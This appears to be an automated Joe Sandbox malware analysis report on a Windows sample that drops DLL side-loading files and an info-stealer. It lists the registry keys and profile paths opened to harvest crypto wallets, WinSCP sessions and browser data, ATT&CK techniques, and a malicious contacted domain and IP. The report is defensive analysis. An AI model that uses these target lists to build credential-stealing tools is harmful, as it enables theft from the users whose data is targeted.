Code function: 6_2_00404FAA GetVersionExW,GetCommandLineW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetModuleFileNameW,_wtol,??2@YAPAXI@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,wsprintfW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,CoInitialize,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetKeyState,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetFileAttributesW,??3@YAXPAX@Z,??3@YAXPAX@Z,_wtol,memset,ShellExecuteExW,WaitForSingleObject,CloseHandle,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,SetCurrentDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,MessageBoxA,

6_2_00404FAA

Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Tries to harvest and steal Bitcoin Wallet information

Stealing of Sensitive Information

Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Key opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Key opened: HKEY_CURRENT_USER\Software\monero-project\monero-core			Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2 Override			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\y572q81e.default	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fu7wner3.default-release	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe

Directory queried: C:\Users\user\Documents

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	11 DLL Side-Loading	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	1 OS Credential Dumping	2 System Time Discovery	Remote Services	11 Archive Collected Data	21 Encrypted Channel	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	11 DLL Side-Loading	1 Abuse Elevation Control Mechanism	1 Credentials in Registry	13 File and Directory Discovery	Remote Desktop Protocol	11 Data from Local System	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Access Token Manipulation	2 Obfuscated Files or Information	Security Account Manager	146 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	13 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	212 Process Injection	1 Timestomp	NTDS	121 Security Software Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 DLL Side-Loading	LSA Secrets	1 Virtualization/Sandbox Evasion	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	121 Masquerading	Cached Domain Credentials	2 Process Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Virtualization/Sandbox Evasion	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Access Token Manipulation	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	212 Process Injection	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
TVr2Z822J3.exe	5%	ReversingLabs

Dropped Files

Source	Detection	Scanner
C:\Users\user\AppData\Local\Temp\josveh	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\itpyyyx	100%	Joe Sandbox ML
C:\Users\user\ActiveISO.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe	0%	ReversingLabs
C:\Users\user\AppData\Roaming\UploadHost_UW\ActiveISO.exe	0%	ReversingLabs
C:\Users\user\AppData\Roaming\UploadHost_UW\Qt5Core.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\UploadHost_UW\Qt5Gui.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\UploadHost_UW\Qt5Network.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\UploadHost_UW\Qt5PrintSupport.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\UploadHost_UW\Qt5Widgets.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\UploadHost_UW\StarBurn.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\UploadHost_UW\msvcp140.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\UploadHost_UW\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\UploadHost_UW\vcruntime140_1.dll	0%	ReversingLabs
C:\Users\user\Qt5Core.dll	0%	ReversingLabs
C:\Users\user\Qt5Gui.dll	0%	ReversingLabs
C:\Users\user\Qt5Network.dll	0%	ReversingLabs
C:\Users\user\Qt5PrintSupport.dll	0%	ReversingLabs
C:\Users\user\Qt5Widgets.dll	0%	ReversingLabs
C:\Users\user\StarBurn.dll	0%	ReversingLabs
C:\Users\user\msvcp140.dll	0%	ReversingLabs
C:\Users\user\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\vcruntime140_1.dll	0%	ReversingLabs

Source	Detection	Scanner	Label
https://sirnisirlo.online/book-review-dixie-betrayed-by-david-j.html?wyqg4gfr=cq78MM938kuJ2nKgWAxh4zrEEePhly1R4ngXih4BvoQA6DDU2kPBtfvIlai0MDMPOcRNFRu%2B5SIIxrsXlGAOqg%3D%3D	0%	Avira URL Cloud	safe
https://sirnisirlo.online:443/book-review-dixie-betrayed-by-david-j.html?wyqg4gfr=cq78MM938kuJ2nKgWA	0%	Avira URL Cloud	safe
http://www.lsoft.net/act/update.aspx?pid=%1&ver=%2&os=%31GotLatestVersion(QString)2LatestVersion(QSt	0%	Avira URL Cloud	safe
http://lsoft.net/act/activate.aspx?ID=%11slotReadyRead()2readyRead()1slotError(QNetworkReply::Networ	0%	Avira URL Cloud	safe
http://www.lsoft.net	0%	Avira URL Cloud	safe
https://sirnisirlo.online:443	0%	Avira URL Cloud	safe
https://www.lsoft.net/act/1DeRegister()2released()Deactivation	0%	Avira URL Cloud	safe
http://www.lsoft.net/act/update.aspx?pid=%1&ver=%2&os=%3	0%	Avira URL Cloud	safe
http://lsoft.net/act/register.aspx?PID=%1&Email=%2&User=%31slotReadyRead()2readyRead()1slotError(QNe	0%	Avira URL Cloud	safe
http://lsoft.net/act/activate.aspx?ID=%1Error1slotReadyRead()Error2readyRead()1slotError(QNetworkRep	0%	Avira URL Cloud	safe
http://www.lsoft.net/act/update.aspx?pid=%1&ver=%2&os=%31DownloadInfo(QString)2DownloadInfo(QString)	0%	Avira URL Cloud	safe
https://sirnisirlo.online/book-review-dixie-betrayed-by-david-j.html?wyqg4gfr=cq78MM938kuJ2nKgWAxh4z	0%	Avira URL Cloud	safe
http://www.lsoft.net/act/update.aspx?pid=%1&ver=%2&os=%31LatestVersion(QString)2LatestVersion(QStrin	0%	Avira URL Cloud	safe
http://lsoft.net/act/register.aspx?PID=%1&Email=%2&User=%3	0%	Avira URL Cloud	safe
https://www.lsoft.net/act/We	0%	Avira URL Cloud	safe
http://lsoft.net/act/activate.aspx?ID=%1	0%	Avira URL Cloud	safe
https://www.lsoft.net/act/	0%	Avira URL Cloud	safe
http://www.ntfs.com/iso_file_manager.htm	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
sirnisirlo.online	188.114.97.3	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://sirnisirlo.online/book-review-dixie-betrayed-by-david-j.html?wyqg4gfr=cq78MM938kuJ2nKgWAxh4zrEEePhly1R4ngXih4BvoQA6DDU2kPBtfvIlai0MDMPOcRNFRu%2B5SIIxrsXlGAOqg%3D%3D	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.phreedom.org/md5)08:27	TVr2Z822J3.exe, 00000006.00000003.1295199028.000000000344E000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000008.00000002.1360603475.00007FFB0BDDA000.00000002.00000001.01000000.00000009.sdmp, ActiveISO.exe, 0000000A.00000002.1429231054.00007FFB09D5A000.00000002.00000001.01000000.00000015.sdmp	false		high
http://www.vmware.com/0	ActiveISO.exe, 00000008.00000002.1338281133.000001AD62440000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 0000000A.00000002.1419280539.000002B7CE542000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.1655004423.0000000005037000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1960900875.0000000002657000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.softwareok.com/?Freeware/Find.Same.Images.OK/History	cmd.exe, 0000000B.00000002.1655004423.0000000005037000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1960900875.0000000002657000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000000.1612798615.00000001401F4000.00000002.00000001.01000000.0000001D.sdmp	false		high
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0	ActiveISO.exe, 00000008.00000003.1327357565.000001AD5F9BA000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ocsp.sectigo.com0	ActiveISO.exe, 00000008.00000003.1327357565.000001AD5F9BA000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.softwareok.com/?Freeware/Find.Same.Images.OK	cmd.exe, 0000000B.00000002.1655004423.0000000005037000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1960900875.0000000002657000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000000.1612798615.00000001401F4000.00000002.00000001.01000000.0000001D.sdmp	false		high
http://lsoft.net/act/register.aspx?PID=%1&Email=%2&User=%31slotReadyRead()2readyRead()1slotError(QNe	ActiveISO.exe, 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmp, ActiveISO.exe, 0000000A.00000000.1335251768.00007FF6B203B000.00000002.00000001.01000000.00000010.sdmp	false	Avira URL Cloud: safe	unknown
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#	ActiveISO.exe, 00000008.00000003.1327357565.000001AD5F9BA000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.lsoft.net	ActiveISO.exe, 0000000A.00000002.1428048059.00007FF6B2023000.00000002.00000001.01000000.00000010.sdmp	false	Avira URL Cloud: safe	unknown
https://www.lsoft.net/act/1DeRegister()2released()Deactivation	ActiveISO.exe, 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmp, ActiveISO.exe, 0000000A.00000000.1335251768.00007FF6B203B000.00000002.00000001.01000000.00000010.sdmp	false	Avira URL Cloud: safe	unknown
http://www.lsoft.net/act/update.aspx?pid=%1&ver=%2&os=%31GotLatestVersion(QString)2LatestVersion(QSt	ActiveISO.exe, 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmp, ActiveISO.exe, 0000000A.00000000.1335251768.00007FF6B203B000.00000002.00000001.01000000.00000010.sdmp	false	Avira URL Cloud: safe	unknown
http://bugreports.qt.io/	ActiveISO.exe, ActiveISO.exe, 0000000A.00000002.1429231054.00007FFB09D5A000.00000002.00000001.01000000.00000015.sdmp	false		high
https://sirnisirlo.online:443	UploadAlt_Ti.exe, 0000000F.00000002.1959820013.0000000000546000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.softwareok.de/?Freeware/Find.Same.Images.OK	cmd.exe, 0000000B.00000002.1655004423.0000000005037000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1960900875.0000000002657000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000000.1612798615.00000001401F4000.00000002.00000001.01000000.0000001D.sdmp	false		high
http://www.lsoft.net/act/update.aspx?pid=%1&ver=%2&os=%3	ActiveISO.exe, ActiveISO.exe, 0000000A.00000000.1335251768.00007FF6B203B000.00000002.00000001.01000000.00000010.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.thawte.com/ThawteTimestampingCA.crl0	TVr2Z822J3.exe, 00000006.00000003.1295199028.000000000344E000.00000004.00000020.00020000.00000000.sdmp, TVr2Z822J3.exe, 00000006.00000003.1295199028.0000000002E34000.00000004.00000020.00020000.00000000.sdmp, TVr2Z822J3.exe, 00000006.00000003.1295199028.00000000026C9000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000008.00000003.1328200308.000001AD62FAB000.00000004.00000001.00020000.00000000.sdmp	false		high
http://lsoft.net/act/activate.aspx?ID=%11slotReadyRead()2readyRead()1slotError(QNetworkReply::Networ	ActiveISO.exe, 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmp, ActiveISO.exe, 0000000A.00000000.1335251768.00007FF6B203B000.00000002.00000001.01000000.00000010.sdmp	false	Avira URL Cloud: safe	unknown
http://www.softwareok.de/?seite=faq-Find.Same.Images.OK&faq=0	cmd.exe, 0000000B.00000002.1655004423.0000000005037000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1960900875.0000000002657000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000000.1612798615.00000001401F4000.00000002.00000001.01000000.0000001D.sdmp	false		high
http://www.softwareok.de	ActiveISO.exe, 00000008.00000002.1338281133.000001AD62440000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 0000000A.00000002.1419280539.000002B7CE542000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.1655004423.0000000005037000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1960900875.0000000002657000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.softwareok.de/?Freeware/Find.Same.Images.OK/History	cmd.exe, 0000000B.00000002.1655004423.0000000005037000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1960900875.0000000002657000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000000.1612798615.00000001401F4000.00000002.00000001.01000000.0000001D.sdmp	false		high
http://www.softwareok.com/?Download=Find.Same.Images.OK	cmd.exe, 0000000B.00000002.1655004423.0000000005037000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1960900875.0000000002657000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000000.1612798615.00000001401F4000.00000002.00000001.01000000.0000001D.sdmp	false		high
https://sirnisirlo.online:443/book-review-dixie-betrayed-by-david-j.html?wyqg4gfr=cq78MM938kuJ2nKgWA	UploadAlt_Ti.exe, 0000000F.00000003.1784459699.0000000000585000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://lsoft.net/act/activate.aspx?ID=%1Error1slotReadyRead()Error2readyRead()1slotError(QNetworkRep	ActiveISO.exe, 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmp, ActiveISO.exe, 0000000A.00000000.1335251768.00007FF6B203B000.00000002.00000001.01000000.00000010.sdmp	false	Avira URL Cloud: safe	unknown
http://www.phreedom.org/md5)	TVr2Z822J3.exe, 00000006.00000003.1295199028.000000000344E000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000008.00000002.1360603475.00007FFB0BDDA000.00000002.00000001.01000000.00000009.sdmp, ActiveISO.exe, 0000000A.00000002.1429231054.00007FFB09D5A000.00000002.00000001.01000000.00000015.sdmp	false		high
https://sectigo.com/CPS0	ActiveISO.exe, 00000008.00000003.1327357565.000001AD5F9BA000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.aiim.org/pdfa/ns/id/	TVr2Z822J3.exe, 00000006.00000003.1295199028.0000000002E34000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000008.00000002.1361209065.00007FFB0C1E8000.00000002.00000001.01000000.00000008.sdmp, ActiveISO.exe, 0000000A.00000002.1429841224.00007FFB0A168000.00000002.00000001.01000000.00000014.sdmp	false		high
http://www.lsoft.net/act/update.aspx?pid=%1&ver=%2&os=%31LatestVersion(QString)2LatestVersion(QStrin	ActiveISO.exe, 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmp, ActiveISO.exe, 0000000A.00000000.1335251768.00007FF6B203B000.00000002.00000001.01000000.00000010.sdmp	false	Avira URL Cloud: safe	unknown
http://www.lsoft.net/act/update.aspx?pid=%1&ver=%2&os=%31DownloadInfo(QString)2DownloadInfo(QString)	ActiveISO.exe, 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmp, ActiveISO.exe, 0000000A.00000000.1335251768.00007FF6B203B000.00000002.00000001.01000000.00000010.sdmp	false	Avira URL Cloud: safe	unknown
http://www.softwareok.de/?Download=Find.Same.Images.OK	cmd.exe, 0000000B.00000002.1655004423.0000000005037000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1960900875.0000000002657000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000000.1612798615.00000001401F4000.00000002.00000001.01000000.0000001D.sdmp	false		high
http://ocsp.thawte.com0	TVr2Z822J3.exe, 00000006.00000003.1295199028.000000000344E000.00000004.00000020.00020000.00000000.sdmp, TVr2Z822J3.exe, 00000006.00000003.1295199028.0000000002E34000.00000004.00000020.00020000.00000000.sdmp, TVr2Z822J3.exe, 00000006.00000003.1295199028.00000000026C9000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000008.00000003.1328200308.000001AD62FAB000.00000004.00000001.00020000.00000000.sdmp	false		high
http://lsoft.net/act/activate.aspx?ID=%1	ActiveISO.exe, ActiveISO.exe, 0000000A.00000000.1335251768.00007FF6B203B000.00000002.00000001.01000000.00000010.sdmp	false	Avira URL Cloud: safe	unknown
http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#	ActiveISO.exe, 00000008.00000003.1327357565.000001AD5F9BA000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.vmware.com/0/	ActiveISO.exe, 00000008.00000002.1338281133.000001AD62440000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 0000000A.00000002.1419280539.000002B7CE542000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.1655004423.0000000005037000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1960900875.0000000002657000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.softwareok.com/?seite=faq-Find.Same.Images.OK&faq=0	cmd.exe, 0000000B.00000002.1655004423.0000000005037000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1960900875.0000000002657000.00000004.00000001.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000000.1612798615.00000001401F4000.00000002.00000001.01000000.0000001D.sdmp	false		high
http://www.???.xx/?search=%s	ActiveISO.exe, 00000008.00000002.1338281133.000001AD62440000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 0000000A.00000002.1419280539.000002B7CE542000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.1655004423.0000000005037000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1960900875.0000000002657000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.symauth.com/cps0(	ActiveISO.exe, 00000008.00000002.1338281133.000001AD62440000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 0000000A.00000002.1419280539.000002B7CE542000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.1655004423.0000000005037000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1960900875.0000000002657000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.color.org)	TVr2Z822J3.exe, 00000006.00000003.1295199028.0000000002E34000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000008.00000002.1361209065.00007FFB0C1E8000.00000002.00000001.01000000.00000008.sdmp, ActiveISO.exe, 0000000A.00000002.1429841224.00007FFB0A168000.00000002.00000001.01000000.00000014.sdmp	false		high
https://sirnisirlo.online/book-review-dixie-betrayed-by-david-j.html?wyqg4gfr=cq78MM938kuJ2nKgWAxh4z	UploadAlt_Ti.exe, 0000000F.00000003.1784459699.0000000000585000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.ntfs.com/iso_file_manager.htm	ActiveISO.exe, 0000000A.00000002.1428048059.00007FF6B2023000.00000002.00000001.01000000.00000010.sdmp	false	Avira URL Cloud: safe	unknown
http://bugreports.qt.io/_q_receiveReplyMicrosoft-IIS/4.Microsoft-IIS/5.Netscape-Enterprise/3.WebLogi	TVr2Z822J3.exe, 00000006.00000003.1295199028.000000000344E000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000008.00000002.1360603475.00007FFB0BDDA000.00000002.00000001.01000000.00000009.sdmp, ActiveISO.exe, 0000000A.00000002.1429231054.00007FFB09D5A000.00000002.00000001.01000000.00000015.sdmp	false		high
http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y	ActiveISO.exe, 00000008.00000003.1327357565.000001AD5F9BA000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.thawte.com/cps0/	TVr2Z822J3.exe, 00000006.00000003.1295199028.000000000344E000.00000004.00000020.00020000.00000000.sdmp, TVr2Z822J3.exe, 00000006.00000003.1295199028.0000000002E34000.00000004.00000020.00020000.00000000.sdmp, TVr2Z822J3.exe, 00000006.00000003.1295199028.00000000026C9000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000008.00000003.1328200308.000001AD62FAB000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.symauth.com/rpa00	ActiveISO.exe, 00000008.00000002.1338281133.000001AD62440000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 0000000A.00000002.1419280539.000002B7CE542000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.1655004423.0000000005037000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1960900875.0000000002657000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.lsoft.net/act/We	ActiveISO.exe, 00000008.00000002.1341509504.00007FF65378B000.00000002.00000001.01000000.00000005.sdmp, ActiveISO.exe, 0000000A.00000000.1335251768.00007FF6B203B000.00000002.00000001.01000000.00000010.sdmp	false	Avira URL Cloud: safe	unknown
https://www.thawte.com/repository0W	TVr2Z822J3.exe, 00000006.00000003.1295199028.000000000344E000.00000004.00000020.00020000.00000000.sdmp, TVr2Z822J3.exe, 00000006.00000003.1295199028.0000000002E34000.00000004.00000020.00020000.00000000.sdmp, TVr2Z822J3.exe, 00000006.00000003.1295199028.00000000026C9000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 00000008.00000003.1328200308.000001AD62FAB000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.lsoft.net/act/	ActiveISO.exe, ActiveISO.exe, 0000000A.00000000.1335251768.00007FF6B203B000.00000002.00000001.01000000.00000010.sdmp	false	Avira URL Cloud: safe	unknown
http://www.info-zip.org/	ActiveISO.exe, 00000008.00000002.1338281133.000001AD623EA000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 0000000A.00000002.1419280539.000002B7CE4EC000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.1655004423.0000000004FEE000.00000004.00000800.00020000.00000000.sdmp	false		high
http://lsoft.net/act/register.aspx?PID=%1&Email=%2&User=%3	ActiveISO.exe, ActiveISO.exe, 0000000A.00000000.1335251768.00007FF6B203B000.00000002.00000001.01000000.00000010.sdmp	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org	UploadAlt_Ti.exe, 0000000F.00000002.1970127366.0000000007F18000.00000004.00001000.00020000.00000000.sdmp	false		high
http://www.surfok.de/	UploadAlt_Ti.exe, 0000000F.00000002.1960900875.0000000002657000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.softwareok.com	ActiveISO.exe, 00000008.00000002.1338281133.000001AD62440000.00000004.00000020.00020000.00000000.sdmp, ActiveISO.exe, 0000000A.00000002.1419280539.000002B7CE542000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000B.00000002.1655004423.0000000005037000.00000004.00000800.00020000.00000000.sdmp, UploadAlt_Ti.exe, 0000000F.00000002.1960900875.0000000002657000.00000004.00000001.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
188.114.97.3	sirnisirlo.online	European Union		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1556011
Start date and time:	2024-11-14 19:55:08 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 54s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	28
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	TVr2Z822J3.exe renamed because original name is a hash value
